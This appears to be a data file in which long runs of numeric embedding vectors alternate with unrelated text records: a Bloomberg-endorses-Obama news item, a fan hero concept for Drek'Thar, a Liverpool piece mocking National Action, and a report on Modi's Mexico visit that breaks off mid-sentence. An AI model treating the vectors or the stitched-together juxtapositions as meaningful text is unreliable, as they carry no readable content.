-0.05220445990562439, -0.035037413239479065, -0.09091507643461227, 0.05250447243452072, 0.026997527107596397, 0.033646728843450546, -0.03626589849591255, 0.025569532066583633, -0.03777037560939789, 0.031353455036878586, -0.11529484391212463, 0.079669289290905, -0.0007703703595325351, 0.04977390170097351, -0.05725361779332161, 0.02256576344370842, 0.025825340300798416, -0.08324609696865082, 0.021527251228690147, 0.023734059184789658, 0.0038882307708263397, -0.020145054906606674, 0.030820589512586594, -0.02207704447209835, 0.01459421031177044, 0.05961000546813011, 0.019551312550902367, -0.058150485157966614, -0.001833064598031342, -0.04033156856894493, 0.04554898664355278, -0.0014618062414228916, -0.00606650672852993, 0.03580915182828903, -0.010502170771360397, 0.047431789338588715, -0.03354203701019287, 0.019908925518393517, 0.021279534325003624, 0.026812119409441948, -0.06618056446313858, 0.028144072741270065, 0.010751854628324509, -0.08929949998855591, 0.058712925761938095, -0.048321787267923355 ]
Bloomberg endorses Obama (Updated) New York City Mayor Mike Bloomberg, whose city is still partially submerged, without power and facing a rising death toll from Hurricane Sandy, endorses President Obama, via the Twitters: And if anyone is wondering what message Bloomberg, who had for months signaled he would stay out of the presidential race, is sending with this endorsement, click here. The endorsement moves climate change front and center in a way that the mayor, who endorses based on specific issues, clearly wants it to be. Bloomberg has been critical of Obama in the past and declined to have Obama come visit New York — the president went to New Jersey, instead. But as the endorsement makes clear, that was not a diss. And the endorsement of the mayor, a business leader, is one that Obama and Mitt Romney had both sought. UPDATE: Bloomberg lays out his case here on his political website, in which he argues that Sandy exemplifies the climate change issue: But we can't do it alone. We need leadership from the White House — and over the past four years, President Barack Obama has taken major steps to reduce our carbon consumption, including setting higher fuel-efficiency standards for cars and trucks. His administration also has adopted tighter controls on mercury emissions, which will help to close the dirtiest coal power plants (an effort I have supported through my philanthropy), which are estimated to kill 13,000 Americans a year. Mitt Romney, too, has a history of tackling climate change. As governor of Massachusetts, he signed on to a regional cap-and-trade plan designed to reduce carbon emissions 10 percent below 1990 levels. "The benefits (of that plan) will be long-lasting and enormous — benefits to our health, our economy, our quality of life, our very landscape. These are actions we can and must take now, if we are to have `no regrets' when we transfer our temporary stewardship of this Earth to the next generation," he wrote at the time. He couldn't have been more right. But since then, he has reversed course, abandoning the very cap-and-trade program he once supported. This issue is too important. We need determined leadership at the national level to move the nation and the world forward. I believe Mitt Romney is a good and decent man, and he would bring valuable business experience to the Oval Office. He understands that America was built on the promise of equal opportunity, not equal results. In the past he has also taken sensible positions on immigration, illegal guns, abortion rights and health care. But he has reversed course on all of them, and is even running against the health-care model he signed into law in Massachusetts. That last point, about Romney having "reversed course on all of" his past "sensible" positions, is at the heart of Obama's argument against Romney right now. Bloomberg has gotten more engaged in electoral politics in the past few weeks, using his firtune to fund a super PAC that senior adviser and current on-leave Deputy Mayor Howard Wolfson is running. Bloomberg is not a swing-state pull. But coupled with the warm words from New Jersey Gov. Chris Christie, whose state was similarly battered by the storm, Obama has had two days in which the cable news focus is going to be on the storm and on testimonials about him. Maggie Haberman is senior political reporter for Politico.
[ 0.026929188519716263, 0.02532750926911831, 0.15085247159004211, 0.05126893147826195, 0.05995567515492439, 0.025582466274499893, 0.013546559028327465, -0.027445144951343536, -0.07338066399097443, -0.047741737216711044, -0.06495948135852814, -0.05104668438434601, -0.004055449739098549, 0.01230666134506464, 0.023263774812221527, 0.09783671796321869, 0.0422709695994854, 0.07517063617706299, -0.07242792099714279, 0.028064334765076637, -0.0004441611818037927, 0.0033140673767775297, -0.021684378385543823, 0.0032526804134249687, -0.00884238351136446, 0.02974667213857174, -0.025166962295770645, -0.0015213245060294867, -0.052364595234394073, 0.05125704035162926, 0.031381383538246155, -0.055168263614177704, -0.029385028406977654, 0.046233125030994415, 0.05261179432272911, 0.044288720935583115, -0.014460861682891846, 0.07233715057373047, 0.031078865751624107, 0.01383519358932972, 0.09088677912950516, -0.04523934796452522, -0.051579833030700684, -0.056988675147295, 0.02021830528974533, 0.019430484622716904, 0.05758598819375038, 0.020947076380252838, 0.003319205716252327, -0.046617813408374786, 0.005851482506841421, -0.028584159910678864, 0.001957967411726713, -0.08677145838737488, 0.01568436250090599, 0.034019388258457184, -0.04841364547610283, -0.02962913177907467, -0.007213508244603872, -0.038319312036037445, 0.009999169036746025, -0.025952186435461044, -0.04531823843717575, 0.05762869119644165, 0.0484800860285759, -0.014621335081756115, -0.07719062268733978, -0.03416901454329491, -0.04618126526474953, -0.06428329646587372, 0.10209959745407104, 0.04419659450650215, -0.0034487820230424404, 0.008606841787695885, 0.02047509327530861, -0.036867525428533554, 0.01616521179676056, 0.09898047894239426, 0.06524604558944702, 0.004959923680871725, 0.07441625744104385, 0.0032636832911521196, 0.0068705035373568535, 0.011407023295760155, 0.008152990601956844, 0.027955107390880585, -0.10242144763469696, -0.025117473676800728, 0.004705706145614386, 0.07551565766334534, -0.0035487969871610403, -0.00270102615468204, 0.056691866368055344, -0.03322979435324669, -0.03186633810400963, -0.0024943749886006117, -0.06559354066848755, 0.005774408113211393, -0.048958487808704376, 0.0428750142455101, -0.01965983957052231, -0.0029301121830940247, -0.01625233329832554, 0.03776555880904198, 0.05442539602518082, -0.015206538140773773, 0.043101076036691666, -0.03312299773097038, -0.07004503160715103, 0.05125493183732033, -0.0023151454515755177, -0.07518556714057922, -0.04041063413023949, -0.02004973217844963, 0.00682415347546339, -0.04114026203751564, -0.04727157950401306, -0.03475405275821686, -0.020503757521510124, -0.0583951473236084, -0.003197756363078952, -0.02269648015499115, 0.003378680208697915, -0.027498774230480194, -0.026181211695075035, -0.03921210393309593, -0.037476714700460434, 5.4300795225434365e-34, -0.006819280330091715, 0.03911400958895683, 0.04613938555121422, 0.025640884414315224, 0.04619830846786499, 0.033642128109931946, -0.015405288897454739, -0.08329451084136963, -0.0004431343113537878, -0.0483805313706398, -0.05737338587641716, 0.067912258207798, 0.04780298471450806, 0.08435599505901337, 0.013279980979859829, 0.02156682126224041, 0.006749825552105904, -0.02651151455938816, -0.026238279417157173, -0.05226157605648041, 0.016735073179006577, 0.008615758270025253, 0.0009035688126459718, 0.0218855831772089, 0.017290055751800537, -0.06102951243519783, 0.06759535521268845, 0.03060692362487316, -0.00335858971811831, 0.015396122820675373, -0.05375167727470398, 0.04421640932559967, -0.05194609612226486, 0.04403725266456604, 0.037000831216573715, -0.009957498870790005, -0.07504548877477646, 0.0025769867934286594, -0.05793929845094681, -0.019055288285017014, -0.04563652351498604, 0.05682564526796341, -0.034682825207710266, 0.05898357927799225, -0.0012604232179000974, 0.040464360266923904, 0.10387251526117325, 0.055013202130794525, 0.005373592488467693, -0.09240314364433289, 0.1030084416270256, 0.010942132212221622, -0.08346673846244812, -0.028218599036335945, -0.05431923270225525, -0.0699201375246048, 0.06001696735620499, -0.006282713729888201, -0.006183066871017218, 0.014739174395799637, -0.009124952368438244, 0.05400397628545761, -0.10748506337404251, 0.05792289972305298, -0.008857209235429764, 0.004357108846306801, -0.03685009479522705, 0.02026294730603695, -0.045856546610593796, -0.018569018691778183, 0.09496504068374634, -0.018130643293261528, 0.049210164695978165, 0.06114634871482849, -0.07941855490207672, -0.04765314608812332, -0.0489601194858551, 0.010456409305334091, 0.023284513503313065, -0.02743423730134964, 0.03826410695910454, -0.06728440523147583, 0.10591430962085724, -0.042849063873291016, -0.03432885929942131, 0.001541375182569027, 0.04871341213583946, 0.005755796562880278, 0.05956684798002243, 0.04307783395051956, -0.04015941545367241, -0.014784686267375946, 0.012269476428627968, 0.07848814129829407, -0.08140835911035538, -4.102126309484383e-33, -0.08057469874620438, -0.019360829144716263, 0.06260926276445389, -0.021441051736474037, -0.0214386023581028, -0.005568705033510923, 0.03711476922035217, -0.0936117097735405, 0.11365728080272675, -0.06562159955501556, -0.05388614907860756, 0.038634784519672394, 0.08606823533773422, 0.06624486297369003, 0.01335185021162033, 0.024506825953722, -0.046618521213531494, -0.038392480462789536, -0.07104337960481644, -0.08152488619089127, 0.03391052782535553, 0.04418947175145149, -0.061154160648584366, 0.05920867621898651, -0.12783783674240112, -0.036979105323553085, 0.0019565869588404894, 0.031673602759838104, 0.03766990080475807, 0.04235737770795822, -0.08205453306436539, 0.03864411264657974, -0.04901876673102379, 0.02119533158838749, 0.04780834913253784, 0.1529873013496399, -0.02099580131471157, -0.1055266410112381, 0.014921077527105808, 0.06132442131638527, 0.02569224126636982, -0.13565047085285187, 0.09364835172891617, -0.0588420145213604, 0.06808850914239883, 0.11057788133621216, -0.026392867788672447, -0.04967932403087616, -0.09116463363170624, -0.05908999219536781, -0.028477469459176064, 0.03765776753425598, -0.13666746020317078, 0.15405988693237305, -0.01671501435339451, 0.029605116695165634, -0.032917194068431854, 0.006828722078353167, 0.060049399733543396, -0.06267701089382172, -0.005059357266873121, -0.031203659251332283, 0.07676110416650772, -0.049294114112854004, -0.04934066906571388, -0.02759418822824955, 0.039984069764614105, -0.0784941092133522, 0.04138237610459328, 0.02353542298078537, -0.014224809594452381, -0.05272806063294411, -0.06705191731452942, -0.024653712287545204, -0.06455487012863159, 0.018871279433369637, -0.06292135268449783, -0.015756826847791672, -0.10178892314434052, 0.04108123481273651, -0.021019838750362396, 0.011709893122315407, -0.04131883755326271, -0.07253476232290268, 0.08037449419498444, -0.0628717839717865, 0.07603025436401367, -0.09751614183187485, -0.05704189091920853, 0.11131761223077774, 0.0481170155107975, -0.01000269502401352, -0.0373130701482296, 0.050874631851911545, -0.13314448297023773, -5.445143003157682e-8, 0.006785504054278135, -0.00737804314121604, -0.0034993025474250317, 0.01710733026266098, 0.030910184606909752, 0.012090088799595833, -0.01969577930867672, -0.05692855641245842, 0.0631294846534729, 0.0344899520277977, 0.06286127865314484, 0.004300710745155811, -0.013823157176375389, 0.02497357688844204, -0.007558008190244436, -0.03139601647853851, -0.004637745209038258, -0.041571445763111115, 0.014920431189239025, -0.0027346769347786903, -0.029380209743976593, 0.04185441508889198, -0.07441337406635284, 0.00969005934894085, 0.061529964208602905, -0.05013570562005043, -0.052278030663728714, 0.09258808940649033, 0.004361716564744711, 0.016944972798228264, -0.04327230527997017, 0.04774680361151695, -0.04951978102326393, -0.05069686099886894, 0.013482281938195229, -0.03600645810365677, 0.02463407814502716, 0.013363235630095005, 0.07542399317026138, 0.03916227072477341, 0.021561618894338608, 0.07166504114866257, -0.056445371359586716, 0.07722257077693939, -0.007291943300515413, -0.06165355443954468, 0.005792683456093073, -0.004530119709670544, 0.03463150933384895, 0.0004889832343906164, 0.03020881675183773, -0.05007809028029442, -0.022740434855222702, 0.010301430709660053, 0.024296317249536514, -0.09394609928131104, -0.12026247382164001, 0.002180685056373477, -0.0254517775028944, 0.007736816070973873, -0.0009314459166489542, -0.051347628235816956, -0.01901707984507084, 0.03603225573897362 ]
hero concept Drek'Thar Frostwolf Chieftain The elder shaman of the Frostwolf clan, Drek'Thar served as Thrall's tutor many years ago. He found the spirits of the elements to be close companions, so shamanism became his path to might. He now comes to the nexus to show is elemental power. Trait: Feral Spirits Drek'thar is assisted in combat by 2 Spirit wolves. Each wolf shares the base basic attack damage and attack speed with Drek'Thar. Sprits always attack Drek'Thar's target Abilities Storm Strike Mana Cost: 60 Cooldown: 6 sec Energizes both your weapons with lightning, dealing 275 (+4% per level) Empower Weaons Mana Cost: 20 Cooldown: 0.5 Swap between Rockbiter and Flametogue weapon enhancements. Rockbiter increases basic attack damage by 80. Flametongue causes your enemy to burn for 20 over 5 seconds. This can stack. Your basic attacks also cleave Spiritwalker grace Mana Cost: 50 Cooldown: 14 sec Remove all roots and slows and increase movement speed by 25% for 2 seconds.
[ -0.06559823453426361, 0.05550704896450043, -0.020923594012856483, 0.07460527122020721, -0.003413467202335596, -0.02457123063504696, 0.029322080314159393, 0.058594487607479095, -0.006245938129723072, 0.017355013638734818, -0.02256671153008938, -0.08730553835630417, -0.07029866427183151, -0.03351938724517822, 0.08319977670907974, 0.13904517889022827, 0.0009216750040650368, 0.038235053420066833, -0.06931412220001221, 0.002323377411812544, 0.03625938296318054, -0.024508817121386528, -0.03348945453763008, 0.0061319852247834206, -0.015008130110800266, -0.023687640205025673, -0.03631305694580078, 0.0023183913435786963, 0.04374208301305771, -0.12784650921821594, 0.08067909628152847, 0.017580006271600723, -0.06713079661130905, -0.007364512886852026, -0.10564631968736649, 0.08734893798828125, 0.010600282810628414, 0.05028399080038071, -0.07657360285520554, 0.04324807971715927, 0.03586685284972191, -0.004735160153359175, -0.019853772595524788, -0.028573766350746155, -0.09417611360549927, -0.0540737621486187, -0.021936941891908646, 0.0236800666898489, -0.036448169499635696, 0.003569306805729866, -0.029063038527965546, -0.03372776880860329, 0.004196505527943373, 0.08182116597890854, -0.01668013073503971, -0.020850012078881264, -0.019062113016843796, -0.01763085089623928, 0.06396285444498062, -0.112919881939888, -0.02402028627693653, 0.06047545000910759, -0.02869344688951969, -0.013344536535441875, 0.04146815091371536, -0.022747477516531944, 0.038834430277347565, 0.008858626708388329, 0.019334960728883743, -0.004698287229984999, 0.0018328676233068109, -0.06944940984249115, 0.05530175566673279, -0.10967561602592468, -0.02556765265762806, 0.009320816025137901, -0.019305406138300896, -0.02696387842297554, -0.028914952650666237, 0.002477467292919755, 0.04932171851396561, 0.031054889783263206, 0.028221670538187027, 0.009941542521119118, 0.0005473800119943917, 0.06006168574094772, -0.008553099818527699, -0.005407718010246754, -0.01016866322606802, 0.012283183634281158, 0.11549674719572067, 0.05774499475955963, -0.02066928707063198, 0.015180794522166252, 0.038048043847084045, 0.05732027813792229, 0.01169378962367773, -0.014779691584408283, -0.08133074641227722, 0.06720198690891266, 0.018421072512865067, -0.035313770174980164, -0.07740363478660583, -0.06865573674440384, -0.04348203167319298, -0.05570843815803528, -0.021117448806762695, -0.027535853907465935, -0.023517433553934097, 0.025894364342093468, 0.06630036979913712, 0.016258032992482185, -0.10111910104751587, 0.05284225195646286, 0.06271722912788391, 0.013462222181260586, -0.03844531998038292, -0.009156333282589912, 0.018432362005114555, 0.022024694830179214, 0.03081831894814968, 0.05637646093964577, 0.015942059457302094, 0.06509023159742355, 0.08774547278881073, -0.04398428648710251, -0.08871781826019287, 1.0173627365194455e-32, 0.07196296006441116, 0.07919607311487198, -0.04776236042380333, -0.03382454067468643, 0.03430069237947464, -0.07122669368982315, -0.023682815954089165, -0.035678718239068985, -0.06209254264831543, 0.0453135147690773, 0.0018497256096452475, 0.03371107950806618, 0.021652990952134132, 0.006908262614160776, -0.017014702782034874, -0.12804067134857178, -0.03660672903060913, -0.04123564809560776, 0.0053976974450051785, -0.06122170761227608, 0.010101474821567535, 0.062257926911115646, -0.0576133206486702, -0.029861729592084885, 0.015380199067294598, 0.081415556371212, 0.013526597060263157, 0.034824565052986145, -0.02916998602449894, 0.0011593857780098915, 0.017774680629372597, -0.07812008261680603, 0.03042934089899063, 0.07299969345331192, -0.005423081573098898, 0.03401173651218414, 0.008419934660196304, -0.03870668634772301, -0.017608100548386574, -0.12188270688056946, -0.018235091120004654, -0.02162850834429264, -0.04498301073908806, -0.038212940096855164, 0.018375303596258163, -0.05923476815223694, -0.048097241669893265, -0.0413953959941864, -0.05698639899492264, -0.005694409366697073, -0.02836090698838234, -0.024146245792508125, -0.016818122938275337, 0.057639192789793015, 0.018592439591884613, 0.007325854618102312, -0.029501285403966904, 0.01530524156987667, 0.0577799454331398, 0.06792911887168884, -0.021855643019080162, -0.08468839526176453, 0.0263934638351202, -0.08434806019067764, 0.0445726104080677, -0.030916860327124596, -0.03158162906765938, 0.0048992689698934555, -0.04669317230582237, -0.03518392890691757, 0.009108572266995907, 0.0471414253115654, 0.08246691524982452, 0.0049455612897872925, 0.00054512097267434, -0.013915233314037323, 0.0032641435973346233, 0.03254009783267975, -0.1124320924282074, 0.05858541652560234, -0.06230571120977402, -0.006443067919462919, -0.014757238328456879, 0.07790258526802063, -0.04213044047355652, -0.09826740622520447, 0.018019625917077065, -0.026233505457639694, -0.049361467361450195, 0.028255943208932877, -0.004966349340975285, -0.08091132342815399, 0.051286112517118454, -0.0817650556564331, 0.02246870845556259, -9.37602726485467e-33, 0.012799737975001335, -0.06308569014072418, 0.0677318274974823, 0.11157605797052383, 0.13085484504699707, -0.02479611150920391, 0.009239967912435532, 0.035200513899326324, 0.0211404487490654, -0.025545086711645126, 0.07522018998861313, 0.06841402500867844, -0.07996514439582825, -0.06424923241138458, 0.11069726198911667, 0.04986951872706413, 0.005867206025868654, 0.00943801924586296, 0.0674942135810852, 0.009024450555443764, 0.0013015789445489645, 0.13339780271053314, -0.07862021028995514, 0.036429665982723236, -0.007816269993782043, 0.0360555462539196, -0.004265293944627047, 0.00953608751296997, 0.06450109928846359, -0.005209431517869234, 0.04739227145910263, 0.052675794810056686, -0.022797269746661186, -0.06893543154001236, -0.05076033994555473, 0.0034432532265782356, -0.07571505755186081, 0.07875645160675049, -0.04134640470147133, -0.00444077281281352, 0.09852748364210129, -0.035645417869091034, 0.02216782048344612, -0.012112307362258434, -0.015534349717199802, -0.005182271357625723, -0.02703113481402397, -0.026287689805030823, 0.058564987033605576, 0.0194553155452013, 0.09111824631690979, -0.014713991433382034, 0.013969707302749157, 0.0690750852227211, -0.0320076160132885, -0.035891324281692505, 0.07526277005672455, -0.03340473026037216, -0.01570942811667919, 0.02116711437702179, 0.008972730487585068, -0.029570776969194412, 0.05748395249247551, 0.02385440096259117, 0.0002413581678410992, -0.02912084572017193, -0.0931968092918396, 0.009477327577769756, -0.015277095139026642, 0.07493843883275986, 0.026397136971354485, 0.0431528203189373, -0.012283558025956154, 0.008454583585262299, 0.007015136070549488, -0.03044225461781025, -0.008554481901228428, -0.047033295035362244, 0.008201543241739273, -0.044150177389383316, -0.10555298626422882, 0.058270376175642014, -0.0620984323322773, -0.012294085696339607, 0.03442813456058502, -0.03501211851835251, 0.011145270429551601, 0.031455148011446, 0.0055705830454826355, -0.06914073973894119, 0.02461984194815159, -0.03365408256649971, 0.05473685637116432, 0.09893814474344254, -0.016605347394943237, -5.6148248717136084e-8, -0.04649840295314789, -0.020335085690021515, 0.011363179422914982, 0.04800858721137047, -0.010274121537804604, 0.06353848427534103, 0.05484510213136673, -0.02117617428302765, -0.13177044689655304, 0.023256836459040642, 0.1109916940331459, 0.011502805165946484, 0.10268346965312958, -0.038996171206235886, 0.08614838868379593, -0.03940027952194214, 0.01770552434027195, 0.0065454416908323765, -0.02719402126967907, -0.14197087287902832, 0.05039028078317642, -0.0415305532515049, 0.04250475764274597, -0.0222781952470541, -0.011721338145434856, 0.10284903645515442, 0.053550947457551956, -0.030999312177300453, 0.07906770706176758, 0.03978695347905159, -0.03275849670171738, 0.09207163006067276, -0.01936967298388481, 0.018662067130208015, 0.06605265289545059, 0.09419825673103333, -0.07111615687608719, -0.03240964561700821, -0.0009243333479389548, 0.02655898779630661, -0.04484386742115021, 0.001811883063055575, 0.030781354755163193, 0.02933374233543873, -0.06813348829746246, -0.0798996165394783, -0.04974130168557167, -0.07335693389177322, 0.05433012917637825, 0.047622229903936386, 0.04575512558221817, 0.05900788679718971, -0.033609259873628616, -0.029407724738121033, 0.000680507393553853, 0.01229029055684805, -0.035341717302799225, -0.01849789172410965, -0.06175290420651436, -0.07817547768354416, 0.06946813315153122, -0.09386518597602844, -0.06776934117078781, -0.014136302284896374 ]
Get the biggest daily stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email Neo-Nazi group National Action returned to Liverpool last weekend, and nobody gave them a blind bit of notice. The far-right fascist group organised a 'White Man March' in August but failed to even make it out of Lime Street station after being cordoned into the left luggage section and pelted with eggs by protesters opposing the event. However, last weekend they returned to the city unannounced and nobody even noticed until they posted a blog entry a week later, claiming they'd 'smashed' Liverpool. That time the neo-Nazis returned to Liverpool and nobody even noticed That time they used a video of the anti-fascists in their own propaganda video That time they 'stormed' Liverpool's Pierhead (with about 18 members) Although their blog post claimed there were more than 30 NA 'militants' in the city, eagle-eyed viewers people that can count could see no more than 20. ... when it was 'packed with tourists' That time they said their slogans 'rang through the streets' Here they can be seen with a handful of members and one man with a megaphone. That time they protested outside the Town Hall... and it was closed because it was a Saturday. Rule number one of planning a neo-Nazi protest: always Google the opening hours. Remember that time they claim they 'brought a small city to a stand still?'.... .... but it was really that time they got cordoned in the lost property depot. The original 'White Man March' resulted in a group of NA 'militants' being cordoned into lost luggage at Lime St before getting the train back home... to the 1940s or wherever it is that Nazis live. Gallery: Last time National Action tried to march in our city
[ 0.07738929986953735, -0.030099350959062576, -0.025358907878398895, 0.029142646118998528, 0.12323718518018723, 0.012388860806822777, 0.08836453408002853, -0.030168302357196808, -0.018988199532032013, -0.016812017187476158, 0.023501314222812653, -0.01926412060856819, 0.006502167321741581, 0.039988722652196884, -0.03095456399023533, 0.026794370263814926, -0.030543392524123192, -0.04916694015264511, -0.10208364576101303, 0.027900701388716698, -0.11316520720720291, -0.06486905366182327, 0.03445851802825928, 0.12144116312265396, -0.06676508486270905, 0.015655508264899254, -0.02409989759325981, 0.05162976682186127, -0.032091110944747925, 0.02546447515487671, 0.04128780961036682, 0.027425620704889297, 0.027213603258132935, 0.05977299436926842, 0.053168557584285736, -0.08367524296045303, 0.13905398547649384, -0.04496200010180473, 0.005345444194972515, -0.002075720578432083, 0.004740604665130377, -0.06635411828756332, 0.004563067574054003, 0.022348439320921898, 0.029983777552843094, 0.0765380784869194, 0.024446751922369003, -0.0030404101125895977, -0.028818145394325256, -0.029468702152371407, -0.008954931981861591, -0.009180641733109951, 0.06622835248708725, -0.05957764759659767, -0.03260967880487442, -0.07405155897140503, -0.01865171268582344, 0.03999226912856102, 0.0008563389419578016, -0.012923209927976131, 0.04633459076285362, -0.06932195276021957, -0.030853165313601494, -0.03211026266217232, -0.04538987949490547, -0.04511594399809837, -0.018991755321621895, 0.029171161353588104, 0.040373802185058594, 0.06999054551124573, 0.013576565310359001, -0.007073919288814068, 0.03780151531100273, 0.03062109649181366, -0.013058937154710293, -0.018271243199706078, 0.023202408105134964, 0.0007772595854476094, -0.012753109447658062, -0.06080273538827896, 0.03945956751704216, -0.022135529667139053, -0.03500240668654442, -0.03790679946541786, 0.047450434416532516, -0.026025880128145218, -0.006699873134493828, 0.0419648215174675, 0.002769235987216234, 0.09468124061822891, -0.049420781433582306, 0.07073899358510971, 0.03779216483235359, -0.0006167337414808571, -0.0013949577696621418, -0.09821103513240814, 0.03562046214938164, 0.034040264785289764, -0.014838309958577156, 0.0703216940164566, -0.007307374384254217, 0.10814852267503738, -0.02437959983944893, -0.05184313654899597, -0.028408771380782127, -0.10901562124490738, -0.03585139662027359, 0.06877850741147995, -0.10477636754512787, 0.00534485699608922, -0.006481341551989317, 0.061547134071588516, -0.002643638988956809, 0.00017158195259980857, 0.07031526416540146, -0.049371786415576935, 0.008402233943343163, 0.021282924339175224, -0.02831292524933815, 0.031099140644073486, -0.0016231409972533584, 0.0797705128788948, -0.055472180247306824, 0.08565859496593475, 0.02860749140381813, 0.08686560392379761, -0.047885190695524216, 5.397089089916617e-33, -0.00010131055023521185, 0.09233516454696655, -0.028720570728182793, 0.05615606531500816, 0.033525753766298294, -0.0063215396367013454, -0.06991799920797348, 0.041034627705812454, 0.04084709659218788, 0.006522352807223797, 0.01236961130052805, 0.0008459038217552006, 0.033464930951595306, -0.07599367946386337, 0.00877371896058321, -0.018428290262818336, -0.05255865678191185, -0.022258171811699867, -0.08986719697713852, -0.04822969809174538, 0.08751630783081055, 0.04752916470170021, -0.033081021159887314, -0.023251136764883995, -0.031550079584121704, -0.007293100468814373, -0.029009146615862846, 0.009702920913696289, 0.031381119042634964, 0.03922139108181, -0.04461978003382683, 0.03518274798989296, -0.01382139790803194, 0.037239134311676025, 0.05691152065992355, -0.039464984089136124, 0.037723664194345474, -0.08350083976984024, -0.010996652767062187, -0.031011052429676056, -0.028005704283714294, -0.00019168869766872376, -0.06581663340330124, 0.02046959102153778, -0.011735709384083748, 0.05643874406814575, -0.05431007593870163, -0.029187219217419624, -0.007042150944471359, -0.10253710299730301, 0.03291206806898117, -0.024173535406589508, -0.01832376793026924, 0.01875358261168003, 0.0035107259172946215, 0.022761467844247818, -0.03727427497506142, -0.00037828917265869677, 0.06585851311683655, -0.015854086726903915, 0.046089056879282, 0.08164447546005249, 0.006933257449418306, 0.0020784204825758934, 0.010247563943266869, -0.05032557621598244, -0.015280243940651417, 0.021536927670240402, -0.07431089878082275, 0.0720602497458458, 0.09723298251628876, 0.0014968696050345898, 0.050587572157382965, -0.0525958314538002, -0.09060302376747131, -0.04215564206242561, -0.00847371481359005, 0.02995249442756176, 0.05137726292014122, 0.05034802109003067, 0.025347724556922913, 0.01934778317809105, 0.04858599230647087, -0.0881357491016388, 0.09157229214906693, -0.00003982928319601342, 0.0625690445303917, -0.06696019321680069, -0.04561849683523178, 0.02466617152094841, -0.10199715197086334, -0.044060587882995605, 0.028986424207687378, -0.036788273602724075, -0.12784814834594727, -6.041481134041979e-33, 0.00460618082433939, 0.007371020503342152, -0.023449068889021873, -0.03417479246854782, -0.043925534933805466, 0.03787429630756378, -0.030358005315065384, 0.020694822072982788, 0.04239407554268837, 0.007035636343061924, -0.014821632765233517, -0.020822491496801376, 0.013603157363831997, 0.03837990015745163, -0.012684309855103493, -0.13828884065151215, 0.14550569653511047, -0.021928243339061737, -0.059413544833660126, 0.01788666844367981, -0.05953110009431839, -0.0632617324590683, -0.04785249009728432, 0.07890179753303528, -0.03902919217944145, 0.01211058720946312, 0.13842825591564178, 0.031510572880506516, -0.02012738771736622, -0.08566871285438538, 0.033581897616386414, -0.032185148447752, -0.0155000826343894, -0.03776213899254799, 0.04296298697590828, 0.0499214231967926, -0.013047156855463982, 0.015784893184900284, -0.031166600063443184, 0.03339269012212753, -0.03772297874093056, -0.032359302043914795, -0.08715426176786423, -0.004869351163506508, -0.07110626995563507, 0.011739199049770832, -0.07855421304702759, -0.020294932648539543, -0.023839082568883896, 0.016449427232146263, 0.017562340945005417, -0.00092488614609465, -0.08077862858772278, 0.07829897105693817, -0.008936386555433273, 0.01609671302139759, -0.06465854495763779, -0.06270959228277206, -0.021820800378918648, -0.023135026916861534, -0.06518874317407608, 0.04236949235200882, -0.10607239603996277, -0.017388325184583664, 0.052629660815000534, -0.09138567745685577, -0.04323071613907814, 0.029016554355621338, 0.00665332842618227, -0.0046642678789794445, 0.027725983411073685, 0.00018002482829615474, -0.02765847183763981, -0.0028993887826800346, -0.02316099777817726, -0.045591872185468674, -0.0329488143324852, 0.036219578236341476, 0.01770785078406334, 0.03109467402100563, 0.016678903251886368, -0.07215284556150436, 0.019555842503905296, 0.05222566798329353, 0.05118081718683243, 0.032957617193460464, 0.02044025808572769, 0.06462936848402023, -0.026422781869769096, 0.04377603530883789, 0.1087360605597496, -0.10004808008670807, -0.020447544753551483, 0.10768181085586548, 0.054697077721357346, -5.797863522616353e-8, -0.023814279586076736, -0.0026322356425225735, 0.01501672063022852, 0.02060382068157196, 0.08367980271577835, -0.03460151329636574, -0.013874758034944534, -0.01742452383041382, -0.03474020957946777, 0.04815281555056572, -0.026820894330739975, -0.013192035257816315, -0.07609823346138, 0.00025436567375436425, -0.06405378133058548, 0.00916354637593031, -0.04261813685297966, -0.13346761465072632, -0.008684483356773853, -0.01731138303875923, -0.007570693735033274, 0.021842598915100098, -0.0357145331799984, -0.008177751675248146, 0.035163573920726776, 0.043676719069480896, -0.11460912227630615, -0.046269554644823074, -0.0023042962420731783, -0.019023291766643524, -0.0302741639316082, -0.05398382991552353, -0.038417261093854904, 0.05231364071369171, -0.005021799821406603, 0.012390632182359695, 0.045943643897771835, 0.012913070619106293, -0.007657627575099468, -0.04750174283981323, 0.01848779246211052, -0.09710507839918137, 0.07908760756254196, 0.044548436999320984, 0.002332191914319992, 0.06588448584079742, -0.11507990956306458, -0.04671268165111542, -0.024347083643078804, -0.058111272752285004, 0.034679993987083435, 0.02356668747961521, 0.04811586067080498, 0.24255046248435974, -0.02851170115172863, -0.017105571925640106, -0.029916225001215935, 0.013647169806063175, -0.004733715206384659, 0.09099936485290527, 0.04251302778720856, 0.015201292000710964, -0.04738824442028999, 0.053567081689834595 ]
In a very special gesture,President @EPN personally drives @narendramodi to a restaurant for Mexican vegetarian fare pic.twitter.com/fF4WWQvUy2 — Vikas Swarup (@MEAIndia) June 9, 2016 Bonding over bean tacos! President @EPN and PM @narendramodi share a meal pic.twitter.com/ckmsmpjWo7 — Vikas Swarup (@MEAIndia) June 9, 2016 PM ends by quoting Octavio Paz “I can understand what it means to be Indian, because I am Mexican” Says its true the other way too. — Vikas Swarup (@MEAIndia) June 9, 2016 NEW DELHI: PM Narendra Modi's cup runneth over in Mexico City today.He got a rapturous welcome from the Indian community in Mexico City. Then, he got President Enrique Peña Nieto's "positive and constructive support" for India's bid to join the Nuclear Suppliers Group (NSG).And to top it all, Peña Nieto personally drove PM Modi for a vegetarian dinner to Quintonil , one of the world's top 50 restaurants of 2015.The PM and Peña Nieto "Bonding over bean tacos!" tweeted external affairs ministry spokesman Vikas Swarup.Modi is the first Indian PM to go on a state visit to Mexico, since former PM Rajiv Gandhi's trip in 1986.And to be sure, there must have been a lot more than bean tacos on the table. President Peña Nieto certainly picked well for the PM, a strict vegetarian.When theworlds50best.com put the restaurant at number 35 in the world last year, it specifically mentioned its vegetarian fare."Though meat is a feature on the tasting menu, (Chef Jorge) Vallejo aims to highlight the value of fruit and vegetables, as much for their flavour as for their nutritional value. Dishes on the tasting menu include huazontles, a green vegetable that vaguely resembles broccoli, with chiapas cheese and red tomato, and nopal cactus snow," the write-up said.Quintonil has also been lauded for being environmentally conscious. A large part of the reason for India wanting NSG membership is so it can move forward in its effort to stem climate change.The restaurant then was perhaps a perfect venue for Modi and Peña Nieto to chat more about the latter's ''constructive'' NSG support."With a strong commitment to reducing the ecological footprint of its food, Quintonil also sources much of its produce from its own 